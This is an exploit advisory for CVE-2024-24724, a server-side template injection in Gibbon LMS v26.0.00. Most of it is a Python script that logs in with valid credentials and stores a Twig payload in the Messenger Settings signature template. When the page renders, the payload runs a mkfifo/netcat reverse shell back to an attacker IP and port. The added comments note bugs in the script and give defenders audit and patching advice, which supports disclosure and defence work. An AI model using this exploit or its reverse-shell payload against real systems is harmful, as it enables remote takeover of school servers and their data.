Authored by Islam Rzayev, Fikrat Guliev, Ali Maharramli

Gibbon version 26.0.00 suffers from a server-side template injection vulnerability that allows for remote code execution.

advisories | CVE-2024-24724

# Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version
# Date: 21.01.2024
# Exploit Author: SecondX.io Research Team (Islam Rzayev, Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24724
import requests
import re
import sys


def login(target_host, target_port,email,password):
# Authenticate against the Gibbon login form and return a session-cookie fragment.
#
# target_host / target_port locate the instance; email / password are the
# credentials of an existing account (the template injection used later is
# post-authentication, so this script needs valid credentials, presumably for an
# account allowed to change School Admin > Messenger Settings -- confirm against
# the application's permission model). Returns element 4 of the Set-Cookie header
# after splitting, which the caller sends back verbatim as the Cookie header.
# Raises KeyError if the response lacks a Set-Cookie or Location header, and
# IndexError if the split produces fewer than five fragments.
url = f'http://{target_host}:{target_port}/login.php?timeout=true'
# The request is hand-built multipart/form-data with a fixed boundary instead of
# using requests' files= support. As pasted on this page the body literal is not
# valid Python (the inner double quotes terminate the f-string); it is kept
# verbatim as a record of the request shape, not repaired.
headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}
data = f"-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="address"rnrnrn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="method"rnrndefaultrn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="username"rnrn{email}rn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="password"rnrn{password}rn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="gibbonSchoolYearID"rnrn025rn-----------------------------174475955731268836341556039466rnContent-Disposition: form-data; name="gibboni18nID"rnrn0002rn-----------------------------174475955731268836341556039466--rn"
# allow_redirects=False keeps the 302 so its Location header can be inspected.
r = requests.post(url, headers=headers, data=data, allow_redirects=False)
# Fragile header parsing: the pattern as pasted is "s+" (runs of the letter s),
# and index 4 is a positional guess tied to this build's exact Set-Cookie layout.
Session_Cookie = re.split(r"s+", r.headers['Set-Cookie'])
# `is not None` never fails for a list element, so the only real signal here is
# the redirect to /index.php; an unexpected layout surfaces as IndexError.
if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):
print("login successful!")

# Returned unconditionally -- a failed login still hands a value to the caller.
return Session_Cookie[4]



def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
# Store a Twig expression in the Messenger Settings "signatureTemplate" field.
#
# cookie is the session value from login(); attacker_ip / attacker_port are
# interpolated into the stored template. Nothing executes in this request: the
# value is only persisted by messengerSettingsProcess.php, and the template is
# evaluated when the settings page is next rendered (see trigger()). Returns
# None; raises KeyError if the response has no Location header.
#
# Defender notes: the durable artifact of this technique is the stored
# signatureTemplate setting containing Twig syntax ("{{ ... |filter('system') }}").
# Audit that setting and web-server logs for POSTs to
# /modules/School%20Admin/messengerSettingsProcess.php from unexpected
# accounts, and apply the vendor fix for CVE-2024-24724 (fixed version not stated
# on this page); restricting Messenger Settings to trusted administrators limits
# who can reach this post-authentication sink.
url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}
# Hand-built multipart body; as pasted on this page the literal is not valid
# Python (inner double quotes end the f-string) and is kept verbatim, unrepaired.
data = f"-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="address"rnrn/modules/School Admin/messengerSettings.phprn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="enableHomeScreenWidget"rnrnYrn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="signatureTemplate"rnrn{{{{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}rn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="messageBcc"rnrnrn-----------------------------67142646631840027692410521651rnContent-Disposition: form-data; name="pinnedMessagesOnHome"rnrnNrn-----------------------------67142646631840027692410521651--rn"
r = requests.post(url, headers=headers, data=data, allow_redirects=False)
# The process page redirects with return=success0 when the setting is saved;
# that redirect target is the only success signal checked.
if 'success0' in str(r.headers['Location']):
print("Payload uploaded successfully!")



def trigger(cookie, target_host, target_port):
# Request the Messenger Settings page so the stored template is rendered.
#
# Rendering is the point at which the value stored by rce() is evaluated by the
# template engine; a GET with the session cookie is all that is needed.
# Returns None. The HTTP response is not inspected.
url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
headers = {"Cookie": cookie}
# Printed before the request is sent and regardless of its outcome, so this
# message is not evidence that anything happened.
print("RCE successful!")
# `r` is assigned but never used; status code and body are discarded.
r = requests.get(url, headers=headers, allow_redirects=False)


# Entry point: six positional arguments, in the order shown in the usage line.
# Credentials are taken from argv, so they are visible in shell history and
# process listings on the machine running the script.
if __name__ == '__main__':
if len(sys.argv) != 7:
print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")
sys.exit(1)
# login() returns unconditionally, so a failed login still leads to the two
# requests below being sent with whatever fragment was returned.
cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
trigger(cookie, sys.argv[1], sys.argv[2])